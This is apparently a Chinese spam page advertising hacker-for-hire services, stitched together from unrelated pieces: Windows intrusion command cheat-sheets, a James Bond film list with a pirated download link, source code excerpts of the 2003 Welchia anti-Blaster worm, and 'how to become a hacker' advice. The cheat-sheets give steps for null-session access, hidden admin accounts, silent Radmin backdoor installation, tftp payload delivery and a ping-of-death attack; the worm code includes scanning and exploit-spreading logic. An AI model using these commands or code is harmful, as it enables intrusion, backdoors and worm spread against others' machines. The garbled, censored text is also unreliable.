黑客24小时在线接单网站

入侵网站,黑客接单,网站入侵,联系黑客,全球最大黑客组织

Akill黑客-killer黑客

本文目录一览:

知道黑客的IP,如何反击他

通过DOS反向连接,然后计算机管理:command MMC

结束进程:NET SHARE

查看版本:ver

查看中端(服务):net start

查看文件:dir

加用户:c:\winnt\system32net user adminserver$ admin /add

提权限:net localgroup administrators adminserver$ /add

211.38.172.2 2180

查看用户net user

远程连接到主机CMD命令:telnet 主机IP

踢人:logoff ID

查看当前人:query user

打开telnet:net start telnet

telnet连接工具:OpenTelnet

删除共享: net share c$=c:\

删除共享: net share c$ /del

启用GUEST:net user guest /active:yes

为GUEST设密码:net user guest 888888

提升到管理员:net localgroup "Administrators" guest /add

超级用户隐藏器:c:\door adminserver$:admin

克隆帐号:ca \\IP 你建立的帐号 密码 肉机默认帐号 密码

ca \\127.0.0.1 adminserver$ admin adminserver admin

完全禁止系统模认工享

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

3389替换服务-----------------------

中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

c:\winnt\system32\copy termsrv.exe service.exe

c:\winnt\system32\cd..

c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口转向:f:\web\ "c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip"

使用空口令连接:

net use \\对方IP\ipc$ "" /user:"administrator"

(在上传文件的目录下)远程复制文件:

c:\radminnet use \\a-01\ipc$ "12345" /user:administrator

c:\ramdincopy r_server.exe \\a-01\admin$\system32

c:\ramdincopy radmin.reg \\a-01\admin$\sytem32

在对方CMD下:

c:\winnt\system32\regedit /s radmin.reg

c:\winnt\system32\r_server.exe /install /silenec

net start r_server

copy r_server.exe \\对方IP\admin$\system32

c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90

copy 文件名 \\IP\admin$\system32

进入对方CMD:

c:\opentelnet.exe \\Ip administrator "" 0 90

登陆CMD:

c:\telnet IP 90

安装RADMIN:

c:\winnt\system32\

r_server /install silence

c:\winnt\system32\

r-server

导入注册表:

c:\winnt\system32\regedit.exe /s aaa.reg

看端口:

c:\winnt\system32\

netstat -an

改端口:

c:\winnt\system32\

r_server.exe /port:1024 /pass:1234 /save /silence

起动服务:

c:\winnt\system32\net start r_server

隐藏文件:

c:\winnt\system32\attrib.exe +h r_server.exe +h

%systemroot$\system32

看看共享开了没有,没有的话把共享开开

c:\winnt\system32net share

清单是空的。

c:\winnt\system32net share ipc$

命令成功完成。

c:\winnt\system32net share admin$

命令成功完成。

注册表运行命令

regedit

查看端口:netstat-n

SA传送文件TFTP

先在本机开tftp服务 sqlexec

tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe

℃冰河℃ 2007-01-02 19:50

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名  开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示 *** 地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并更大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令=字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地 *** 配置情况

它是用来检查 *** 是否通畅或者 *** 连接速度的命令。作为一个生活在 *** 上的管理员或者黑客来说,ping命令是之一个必须掌握的DOS命令,它所利用的原理是这样的: *** 上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标

主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在

DOS窗口中键入:ping /? 回车,出现如图1所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了。

-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标

P是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 够 *** 他了。不要用于其他目的哦!!!!!

007系列电影的名字所有,都叫什么?

《007系列电影》百度网盘高清资源免费在线观看:  

链接:

提取码:h6zf  

之一部:肖恩·康纳利,《诺博士》 (之一任007) Dr. No,1962年

第二部:肖恩·康纳利,《来自俄罗斯的爱情》(之一任007) From Russia with Love,1963年

第三部:肖恩·康纳利,《金手指》(之一任007) Goldfinger,1964年

第四部:肖恩·康纳利,《雷电堡》(之一任007) Thunderball,1965年

第五部:肖恩,康纳利,《雷霆谷》(之一任007) You OnlyLive Twice,1967年

第六部:乔治·拉赞贝,《女王密使》(第二任007) On HerMajesty`s Secret Service,1969年

第七部:肖恩·康纳利,《金刚钻》(之一任007) Diamondsare Forever,1971年

第八部:罗杰·摩尔,《生死关头》 (第三任007) Live andLet Die,1973年

第九部:罗杰·摩尔,《金枪人》 (第三任007) The ManWith The Golden Gun,1974年

第十部:罗杰·摩尔,《海底城》(第三任007) The Spy WhoLoved Me,1977年

第十一部:罗杰·摩尔,《太空城》(第三任007) Moonraker,1979年

第十二部:罗杰·摩尔,《更高机密》(第三任007) For YourEyes Only,1981年

第十三部:罗杰·摩尔,《八爪女》(第三任007) Octopussy,1983年

第十四部:罗杰·摩尔,《雷霆杀机》(第三任007) A View To AKill,1985年

第十五部:提摩西·达顿,《黎明生机》(第四任007) The Living Daylights,1987年

第十六部:提摩西·达顿,《杀人执照》(第四任007) Licence to Kill,1989年

第十七部:皮尔斯·布鲁斯南,《黄金眼》(第五任007) Goldeneye,1995年

第十八部:皮尔斯·布鲁斯南,《明日帝国》(第五任007) Tomorrow Never Dies,1997年

第十九部:皮尔斯·布鲁斯南,《黑日危机》(第五任007) The World Is Not Enough,2000年

第二十部:皮尔斯·布鲁斯南,《择日而亡》(第五任007) Die Another Day,2002年

第二十一部:丹尼尔·克雷格,《皇家赌场》(第六任007) Casino Royale,2006

第二十二部:丹尼尔·克雷格,《大破量子危机》(第六任007),Quantum of Solace,2008

第二十三部:丹尼尔·克雷格,《大破天幕杀机》(第六任007),Skyfall,2012

相关资源:

007系列电影

《冲击波杀手》那个黑客是谁?

这个问题警察也想知道 也没人在网上公布

给您转一篇文章 也许对您有用

冲击波杀手的作者网上现身

前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域 *** 带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见

8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~

char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~

Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";

偶:小地方小公司小小程序员

偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂

~~~

B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众

偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳

~~

C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~

D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~

E 长了这么大,算首次报效社会吧~~~

F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!

======================================================

0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改

(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)

此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp

他丫的,还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~

4 某年某月某日某时某刻,

溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器

架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段

10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~

5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ *** 一下也好~~~

打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~

BOOL DoServicePackFunction()

{

DWORD nSystemVer = Win2000OrXp();

if ( !( nSystemVer == 0 || nSystemVer == 1) )

return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )

return FALSE; //已经安装了

//识别语言版本

int nLanguageID;

unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();

WORD wMain = PRIMARYLANGID(lcid);

WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en

nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~

//管不了小欧洲~~ 俄罗斯牛人有自己的玩法

~~

else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn

nLanguageID = 1; //就是为这个来的~~

else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw

nLanguageID = 2; //同胞骨肉的忙,一定要帮~~

else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp

nLanguageID = -1; //偶好有干掉鬼子机器的冲动!

//罢了,冤冤相报何时了~~~ 希望他丫的自新

~~~ 再玩火就灭了他丫的~~

else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr

nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~

else{

nLanguageID = -1;

}

if ( nLanguageID == -1)

return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~

if ( !nSystemVer ) { // 2k

if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )

return FALSE;

}

else{

if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )

return FALSE;

}

char szExec[180];

sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );

if ( hProcess == NULL )

return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内

未完成

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

DeleteFile(szServicePack);

return FALSE;

}

CloseHandle(hProcess);

Sleep(15000);

DeleteFile(szServicePack);

if ( ReadRegServicePack(nSystemVer) ) {

ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot

it~~~

Sleep(20000); //说偶重启有过? 不重启补丁无效,

找 Bill该死 说去~~~

}

return TRUE;

}

// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~

void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL

bWebDav)

{

HANDLE hThread = NULL;

BOOL bFirst = TRUE;

u_long uComp;

for (int i=0;i (nBCount * 256 * 256); i++){

if ( bRand )

uComp = MakeRandIp();

else

uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好

~~~

(BYTE)uComp == 0xc5 ||

(BYTE)(uComp8) == 0xc5 ||

(BYTE)(uComp16) == 0xc5 ||

(BYTE)(uComp24) == 0xc5 ||

(WORD)uComp == 0x9999 ||

(WORD)(uComp8) == 0x9999 ||

(WORD)(uComp16) == 0x9999 )

continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次

Sleep(100);

myPara = new u_long;

}

if ( myPara ){

if ( hThread )

CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)

hThread =

CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);

else

hThread =

CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);

Sleep(2);

}

//添加此处代码,避免首次执行时,线程中的

InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的

bug!

if ( bFirst (i = nMaxThread) ){

Sleep(2000);

bFirst = FALSE;

}

while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,

玩过了~~~

Sleep(2);

}

Sleep(60000);

}

//服务模式和控制台模式公用主程序

void DoIt()

{

WSADATAwsd;

if(WSAStartup(MAKEWORD(2,2),wsd)!=0)

return;

//杀蠕虫

KillM *** last();

//卸载

SYSTEMTIME st;

GetLocalTime(st);

if ( st.wYear == 2004 ){

MyDeleteService(szServiceName);

MyDeleteService(szServiceTftpd);

RemoveMe();

ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将

自身文件删除了

}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));

//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补

丁已经打够了!~~~

//准备WebDav发送缓冲区

do{

pWebDavExploitBuffer = new char[68000];

Sleep(100);

}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹

PressWebDavBufferOnce();

PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口

//打补丁

DoServicePackFunction();

//建立接收线程

DWORD dwThreadID;

HANDLE

hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L

PVOID)NULL,0,dwThreadID);

if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,

同时处理多个反连

return;

CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){

Sleep(1000);

InstallTftpService();

Sleep(1000);

MyStartService(szServiceTftpd);

}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;

for(;{ //估算了一下,普通机器2小时一循环

//首先扫描本ip段

CheckOnlienAndPressData();

ulIP = ntohl(inet_addr(szLocalIp));

ulIP = 0xffff0000;

BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段

CheckOnlienAndPressData();

if ( rand() % 2)

ulIP += 0x00010000;

else

ulIP -= 0x00030000;

BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁

CheckOnlienAndPressData();

ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,

立即采取补救措施~~~ sorry~~~

BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav

CheckOnlienAndPressData();

if ( rand() % 2)

BeginExploitFunction( ulIP, 1, 1, 0);

else

BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillM *** last();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读,增加几个补充说明

1.flashsky 创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你更好别招惹他,DDOS你一把也够受的。

3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。

瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。

瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和 *** 资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。

黑客要知道些什么基本知识?

一、学习技术:

互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。

初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。

二、伪装自己:

黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。

伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对 *** 进行攻击,否则一旦自己的行迹败露,最终害的害是自己。

如果有朝一日你成为了真正的黑客,我也同样不赞成你对 *** 进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。

三、发现漏洞:

漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。

黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点--世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。

四、利用漏洞:

对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情:

1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统;

2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器;

3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统;

4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护 *** 安全的事情;

5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的 *** !

第二节、黑客应掌握的基本技能

从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。

一、了解一定量的英文:

学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内 *** 管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的 *** 安全网站。

二、学会基本软件的使用:

这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用 *** ,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。

三、初步了解 *** 协议和工作原理:

所谓“初步了解”就是“按照自己的理解方式”弄明白 *** 的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候 *** 是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。

四、熟悉几种流行的编程语言和脚本:

同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。

五、熟悉 *** 应用程序:

*** 应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者更好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚 *** 工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果

/本篇文章来源于 新贵网 原文出处:

黑客常用DOS命令详解

黑客常用DOS命令:

net use $"\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空链接

net use $"\\ip\ipc$Content$nbsp;"密码" /user:"用户名" 建立IPC非空链接

net use h: $"\\ip\c$Content$nbsp;"密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

